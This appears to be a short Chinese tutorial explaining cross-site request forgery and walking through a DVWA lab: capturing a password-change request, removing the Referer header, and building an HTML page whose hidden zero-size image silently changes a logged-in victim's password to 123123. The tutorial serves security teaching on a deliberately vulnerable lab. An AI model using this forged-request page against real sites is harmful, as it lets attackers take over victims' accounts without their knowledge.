CSRF漏洞原理

web應用程式在使用者進行敏感操作時,如修改賬號密碼,新增賬號,轉賬等,沒有校驗表單token或者http請求頭中的referer值,從而導致惡意攻擊者利用被攻擊者的身份完成對應的而已請求.

CSRF練習

1. 開啟dvwa測試系統,登入.
2. 開啟抓包工具,進入CSRF練習頁面,修改密碼,提交
3. 修改抓取的報文,刪除referer欄位,重新提交.
4. 修改密碼成功,說明存在CSRF漏洞.
5. 構造攻擊頁面,程式碼:

<!DOCTYPE HTML PUBLIC "-//w3c/DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWAP CRSFTester Demonstration</title>
</head>

<body>
 <h2>OWASP CRSFTester Demonstration</h2>
 <img src="http://xx.xxx.xx.x:8080/dvwa/vulnerabilities/csrf/?password_new=123123&password_conf=123123&Change=%B8%FC%B8%C4" width="0" height="0" border="0"/>
</body>
</html>
 

4. 點選攻擊頁面.html檔案. 因為使用者處於登入dvwa系統的狀態,通過抓包可以看到此時會自動填充Cookie等資訊,自動修改使用者密碼成功.

   image.png